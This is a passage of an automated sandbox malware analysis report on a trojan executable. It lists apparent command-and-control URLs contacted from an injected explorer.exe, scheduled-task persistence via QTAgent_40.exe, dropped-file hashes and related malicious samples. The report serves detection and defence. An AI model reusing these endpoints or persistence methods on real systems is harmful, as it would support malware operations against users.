http://moviecentral-petparade2.com/g9jvjfd74/index.phprD	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php%6	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.php6D	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpWE	explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/Jcl8087.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpJ	explorer.exe, 0000000C.00000003.2156574293.00000000030DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnitVersioni	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpO	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpbE	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpc%v	explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phps%f	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpshqos.dll.muic	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclBase.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpoviecentral-petparade2.com	explorer.exe, 0000000C.00000002.2601540859.00000000030B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2347011547.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclMime.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php9D	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclWideStrings.	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpj	explorer.exe, 0000000C.00000003.2156574293.00000000030DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2173467898.00000000030DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpED	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php)E	explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysUtils.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/sevenzip.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclLogic.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phppjy	explorer.exe, 0000000C.00000003.2251805547.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2173311069.00000000030BE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156574293.00000000030BE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclSecurity.pa	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phppjy	explorer.exe, 0000000C.00000003.2347011547.00000000030BE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php6D	explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpWE	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpG4	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/zlibh.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpoviecentral-petparade3.comi	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclRTTI.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpgs	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.php8E	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpwshqos.dll.mui	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php?4	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.symauth.com/cps0(	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSysInfo.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php&E	explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclShell.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpshqos.dll.muic	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfj	explorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclIniFiles.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://www.symauth.com/rpa00	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.info-zip.org/	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006928000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D09000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004DEF000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004429000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F04000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D05000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.00000000052C7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclResources.pa	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclCompression.	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.php&E	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSimpleXml.pa	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclWin32.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php.php	explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpb	explorer.exe, 0000000C.00000003.2173467898.00000000030DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpshqos.dll.mui	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.php#K	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpi	explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php	explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpcD	explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclDateTime.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclRegistry.pa	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclCharsets.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpO	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpLy	explorer.exe, 0000000C.00000002.2601540859.00000000030BD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpswsock.dll.mui	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpcs_K	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php3$	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php3%	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php#	explorer.exe, 0000000C.00000003.2156574293.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.phpR	explorer.exe, 0000000C.00000003.2251682160.00000000030DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclConsole.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.php9D	explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php(	explorer.exe, 0000000C.00000003.2173311069.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/Snmp.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpoviecentral-petparade3.com	explorer.exe, 0000000C.00000003.2251682160.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.00000000030B1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index	explorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php$	explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.0000000003027000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpJM	explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php0	explorer.exe, 0000000C.00000003.2173311069.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2347011547.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156574293.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2251682160.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php#$	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php1	explorer.exe, 0000000C.00000003.2347011547.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2251682160.00000000030D4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpcD	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php#%	explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade.com/g9jvjfd73/index.php$	explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnicode.pas	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpBM	explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php8	explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade2.com/g9jvjfd74/index.phpjy	explorer.exe, 0000000C.00000002.2601540859.00000000030BD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpC$V	explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclAnsiStrings.	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	false		unknown
http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpA	explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.vmware.com/0/	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.213.173	moviecentral-petparade.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546122
Start date and time:	2024-10-31 14:24:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@18/10@37/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 34 Number of non-executed functions: 78
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Simulations

Behavior and APIs

Time	Type	Description
09:25:03	API Interceptor	1x Sleep call for process: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe modified
09:25:18	API Interceptor	2x Sleep call for process: QTAgent_40.exe modified
09:25:26	API Interceptor	1x Sleep call for process: comp.exe modified
09:25:30	API Interceptor	858514x Sleep call for process: explorer.exe modified
13:25:16	Task Scheduler	Run new task: QTAgent_40 path: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
13:25:16	Task Scheduler	Run new task: ServiceHub Controller path: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	fattura di pagamento.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	http://www.kristinsacademy.com/?wptouch_switch=desktop&redirect=http://lagunaua.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://0nline1.logs-trading.site/?O462BZ3P81OgZBK	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	13.107.246.45
	https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4	Get hash	malicious	Unknown	Browse	13.107.246.45
	PURCHASE ORDER085.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s599af221dbfd41b9a607812ebc66d2cf&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VpSHltbG45MjdsQnBnZUJMcnhtMHM4QjRNbHFPTTJWd0ZlQTFNLWNhZ0lnRkE_ZT1aak8wczY&wd=target%28Sezione%20senza%20titolo.one%7C99ad2a4b-5ecc-495f-9ce8-040ac62eb8f2%2F%5BExternal%5D%20-%20Invoice%20%27s%208808-%7C9e6e973e-3cda-429a-a28f-c51dc242e5b1%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	13.107.246.45
	Orden de compra.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.45
	1225212711935914624.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	169778715180725424.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Set-Up.exe	Get hash	malicious	LummaC	Browse	104.21.79.109
	http://www.kristinsacademy.com/?wptouch_switch=desktop&redirect=http://lagunaua.com	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Invoice Ref ++_Donuts.html	Get hash	malicious	Unknown	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.41.158
	PO-000172483 (2).exe	Get hash	malicious	FormBook, GuLoader	Browse	188.114.96.3
	Uschamber-TimeSheet Reports.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	https://www.chambersschool.org/programs/early-childhood	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.140

Process:	C:\Windows\SysWOW64\comp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	544256
Entropy (8bit):	6.52754951546901
Encrypted:	false
SSDEEP:	12288:F/zTlHFqRB2rAikFpF5ibr4jGq88DUqlL6PHtqekY:cRBzj5ifj8DHoftqeH
MD5:	BE34377934380A888F46809916989EF2
SHA1:	B2E98C16C4F19E128EB243E5427C2904A6D8D9FD
SHA-256:	9ECACDB5102C2543CFEA48CB11808EB7C92331F5F3D107990271F9D53CAB20FD
SHA-512:	B26303F92EA1E387BBE4C4DE7961255D3485B77E5FD621D79F59CCBB7ECFAE5AC5E160AA4D93896DB978D6D1864703967B1DF58C8439490E0B9F947652D1533D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...........)...../.r.........)...../.................+......+.?....#.............(....Rich...........PE..L....m.\..........................................@.......................................@..................................5...................................E..l...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bhla.......... ......................@...................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\d2d22b7a

Download File

Process:	C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
File Type:	PNG image data, 4432 x 696, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1404020
Entropy (8bit):	7.994316031132943
Encrypted:	true
